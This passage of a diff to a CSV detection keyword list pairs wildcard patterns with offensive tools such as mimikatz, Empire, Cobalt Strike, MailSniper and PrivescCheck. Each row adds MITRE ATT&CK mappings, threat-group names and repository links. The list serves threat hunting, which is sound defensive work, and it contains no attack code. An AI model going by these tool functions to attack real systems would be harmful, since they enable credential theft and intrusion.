Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Tokenvator*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-UacCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-UacCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UdpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UacCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UdpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-UnattendFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-UnattendFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation 
Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UpdateMimikatzScript.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","23","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" -"*Invoke-UrbanBishop*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*invoke-urlcheck -urls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-UserCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UserEnvCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UserGroupsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UnattendFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UpdateMimikatzScript.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-UrbanBishop*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invoke-urlcheck -urls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-UserCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserEnvCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script 
for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserGroupsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*invokeuserhunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-UserHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-UserHunter*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-UserHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-UserHunter*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-UserHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-userhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" -"*Invoke-UserImpersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-UsernameHarvestEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-UsernameHarvestGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-UsernameHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UserImpersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-UsernameHarvestEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UsernameHarvestGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UsernameHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-UserPrivilegesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-UserPrivilegesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UserRestrictedSidsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UserSessionListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UsersHomeFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserPrivilegesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserRestrictedSidsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserSessionListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UsersHomeFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-VaultCredCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-VaultCredCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation 
Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-VaultListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Vnc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - 